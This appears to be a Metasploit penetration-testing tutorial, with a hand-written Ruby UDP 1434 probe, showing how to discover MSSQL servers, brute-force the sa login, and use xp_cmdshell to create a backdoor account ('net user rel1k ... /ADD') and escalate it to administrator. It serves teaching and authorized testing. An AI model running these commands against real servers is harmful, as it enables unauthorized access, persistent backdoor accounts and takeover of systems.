
Hunting for MSSQL

One of my personal favorites is the UDP footprinting of MSSQL servers. If you are performing an internal penetration test, this is a must-use module. A default SQL Server instance listens on TCP 1433, but named instances (and any instance an administrator has reconfigured) listen on a dynamic TCP port chosen at service start, which makes them hard to find with a plain TCP port scan. Fortunately Microsoft ships the SQL Server Browser service (the SQL Server Resolution Service on SQL Server 2000) on UDP 1434; a single UDP query to it returns the server name, instance name, version, and the TCP port the listener is actually on. Let's load the module and use it to discover multiple servers.

msf > search mssql
[*] Searching loaded modules for pattern 'mssql'...

Exploits
========

   Name                                       Description
   ----                                       -----------
   windows/mssql/lyris_listmanager_weak_pass  Lyris ListManager MSDE Weak sa Password
   windows/mssql/ms02_039_slammer             Microsoft SQL Server Resolution Overflow
   windows/mssql/ms02_056_hello               Microsoft SQL Server Hello Overflow
   windows/mssql/mssql_payload                Microsoft SQL Server Payload Execution


Auxiliary
=========

   Name                       Description
   ----                       -----------
   admin/mssql/mssql_enum     Microsoft SQL Server Configuration Enumerator
   admin/mssql/mssql_exec     Microsoft SQL Server xp_cmdshell Command Execution
   admin/mssql/mssql_sql      Microsoft SQL Server Generic Query
   scanner/mssql/mssql_login  MSSQL Login Utility
   scanner/mssql/mssql_ping   MSSQL Ping Utility

msf > use scanner/mssql/mssql_ping
msf auxiliary(mssql_ping) > show options

Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target address range or CIDR identifier
   THREADS  1                yes       The number of concurrent threads

msf auxiliary(mssql_ping) > set RHOSTS 10.211.55.1/24
RHOSTS => 10.211.55.1/24
msf auxiliary(mssql_ping) > exploit

[*] SQL Server information for 10.211.55.128:
[*] tcp = 1433
[*] np = \\SSHACKTHISBOX-0\pipe\sql\query
[*] Version = 8.00.194
[*] InstanceName = MSSQLSERVER
[*] IsClustered = No
[*] ServerName = SSHACKTHISBOX-0
[*] Auxiliary module execution completed

The first command searches the loaded modules for anything matching 'mssql'. 'use scanner/mssql/mssql_ping' then loads the scanner module, and 'show options' lists what it needs from us. 'set RHOSTS 10.211.55.1/24' sets the subnet range we want to look for SQL servers on; you can specify a /16 or whatever range you want to go after. I would recommend increasing THREADS, because each probe waits for a UDP reply that may never come, and a single-threaded scan of a large range takes a long time.
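What mssql_ping actually does on the wire is simple enough to reproduce by hand, and doing so makes the output above easier to read. The following Ruby is an added example written for this page, not code from the Metasploit module: it builds the one-byte SSRP client request the SQL Server Browser service expects on UDP 1434, parses the reply (a 0x05 byte, a little-endian length, then "key;value;" pairs with each instance terminated by ";;"), and reduces it to the TCP listener per instance. The function names, the sample datagrams (constructed to mirror the page's output plus a second host with a named instance on a dynamic port), and the timeout are all my own choices.

```ruby
require 'socket'

# SSRP (MS-SQLR) message types spoken by the SQL Server Browser service on UDP 1434.
CLNT_BCAST_EX = "\x02".b  # broadcast: every Browser on the subnet answers with its instances
CLNT_UCAST_EX = "\x03".b  # unicast: one host answers with all of its instances
SVR_RESP      = 0x05      # first byte of every Browser reply
SSRP_PORT     = 1434

# Parse one SVR_RESP datagram into an array of hashes, one per instance.
# Wire format: 0x05, then a little-endian uint16 length, then RESP_DATA such as
#   "ServerName;X;InstanceName;Y;IsClustered;No;Version;8.00.194;tcp;1433;;"
# where each instance block is terminated by ";;".
def parse_ssrp_response(data)
  raise ArgumentError, 'datagram too short' if data.bytesize < 3
  raise ArgumentError, 'not an SVR_RESP' unless data.getbyte(0) == SVR_RESP

  len  = data.byteslice(1, 2).unpack1('v')
  body = data.byteslice(3, len)
  raise ArgumentError, 'truncated RESP_DATA' if body.nil? || body.bytesize < len

  body.split(';;').map { |block|
    fields = block.split(';')
    next nil if fields.empty? || fields.size.odd?   # a block must be key;value pairs
    fields.each_slice(2).to_h
  }.compact
end

# Reduce parsed instances to what an attacker needs next: where the TDS listener is.
# Instances that advertise no tcp field (TCP/IP disabled) get port nil.
def listener_targets(instances)
  instances.map do |i|
    { server: i['ServerName'], instance: i['InstanceName'],
      version: i['Version'], port: i['tcp'] ? i['tcp'].to_i : nil }
  end
end

# Send one CLNT_UCAST_EX to host and return its parsed instances
# (empty if nothing answers within the timeout). Needs network access.
def ssrp_probe(host, timeout: 3)
  sock = UDPSocket.new
  sock.send(CLNT_UCAST_EX, 0, host, SSRP_PORT)
  return [] unless IO.select([sock], nil, nil, timeout)
  data, = sock.recvfrom(65_535)
  parse_ssrp_response(data)
ensure
  sock&.close
end

# Wrap RESP_DATA text in the SVR_RESP header the way the Browser service would.
def build_svr_resp(resp_data)
  [SVR_RESP, resp_data.bytesize].pack('Cv') + resp_data.b
end

# Constructed sample datagrams (not captured from a real host).
# One default instance on 1433, mirroring the scan output on this page.
SAMPLE_DEFAULT_INSTANCE = build_svr_resp(
  'ServerName;SSHACKTHISBOX-0;InstanceName;MSSQLSERVER;IsClustered;No;' \
  'Version;8.00.194;tcp;1433;np;\\\\SSHACKTHISBOX-0\\pipe\\sql\\query;;'
)
# Two instances on one host: the default on 1433 plus a named instance on a dynamic port.
SAMPLE_TWO_INSTANCES = build_svr_resp(
  'ServerName;DBHOST;InstanceName;MSSQLSERVER;IsClustered;No;Version;10.50.1600.1;tcp;1433;;' \
  'ServerName;DBHOST;InstanceName;SQLEXPRESS;IsClustered;No;Version;10.50.1600.1;tcp;49158;;'
)

if $PROGRAM_NAME == __FILE__
  # With a host argument, probe it for real; otherwise parse the constructed sample.
  instances = ARGV[0] ? ssrp_probe(ARGV[0]) : parse_ssrp_response(SAMPLE_DEFAULT_INSTANCE)
  listener_targets(instances).each do |t|
    puts "#{t[:server]}\\#{t[:instance]} version #{t[:version]} tcp=#{t[:port] || 'none advertised'}"
  end
end
```

Run it with no arguments to parse the constructed sample, or pass a host (`ruby ssrp.rb 10.211.55.128`) to query a live Browser service. A named instance answering with `tcp;49158` is exactly the dynamic-port case a TCP-only scan would miss; an instance with no `tcp` field has TCP/IP disabled and is reachable only over named pipes.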

Once 'exploit' (or its alias 'run', which does the same thing for an auxiliary module) is issued, the scan sends the UDP 1434 probe to every host in the range and pulls back the instance information from any that answer. As we can see, the machine is named "SSHACKTHISBOX-0", the default instance (MSSQLSERVER) is listening on TCP 1433, and the version 8.00.194 identifies SQL Server 2000 RTM. At this point you could use the 'scanner/mssql/mssql_login' module to brute-force the password by passing it a dictionary file; Fast-Track, medusa, or hydra will do the job as well. Once you have the password, there is a neat little module for executing commands through the xp_cmdshell stored procedure. Note that xp_cmdshell requires a sysadmin login ('sa' or equivalent), and on SQL Server 2005 and later it is disabled by default, which a sysadmin login can turn back on with sp_configure.

msf auxiliary(mssql_login) > use admin/mssql/mssql_exec
msf auxiliary(mssql_exec) > show options

Module options:

   Name        Current Setting                                       Required  Description
   ----        ---------------                                       --------  -----------
   CMD         cmd.exe /c echo OWNED > C:\owned.exe                  no        Command to execute
   HEX2BINARY  /pentest/exploits/framework3/data/exploits/mssql/h2b  no        The path to the hex2binary script on the disk
   MSSQL_PASS                                                        no        The password for the specified username
   MSSQL_USER  sa                                                    no        The username to authenticate as
   RHOST                                                             yes       The target address
   RPORT       1433                                                  yes       The target port


msf auxiliary(mssql_exec) > set RHOST 10.211.55.128
RHOST => 10.211.55.128
msf auxiliary(mssql_exec) > set MSSQL_PASS password
MSSQL_PASS => password
msf auxiliary(mssql_exec) > set CMD net user rel1k ihazpassword /ADD
cmd => net user rel1k ihazpassword /ADD
msf auxiliary(mssql_exec) > exploit

The command completed successfully.


[*] Auxiliary module execution completed

Looking at the output of 'net user rel1k ihazpassword /ADD', the command completed successfully, so a local user account named "rel1k" now exists on the SQL server. Commands run through xp_cmdshell execute with the privileges of the SQL Server service account, which on installations of this vintage is commonly LocalSystem or a local administrator (had the service been running as a low-privileged account, the 'net user' command would have failed). From there we could issue 'net localgroup administrators rel1k /ADD' to make that account a local administrator on the system itself. We have full control over this system at this point.

 

© Offensive Security 2009